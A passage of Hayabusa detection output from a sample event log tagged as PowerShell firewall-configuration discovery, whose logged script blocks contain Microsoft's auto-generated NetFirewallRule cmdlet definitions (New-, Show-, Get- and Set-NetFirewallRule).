$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name 
= 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 
'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.Conta",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"insKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and 
(@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] 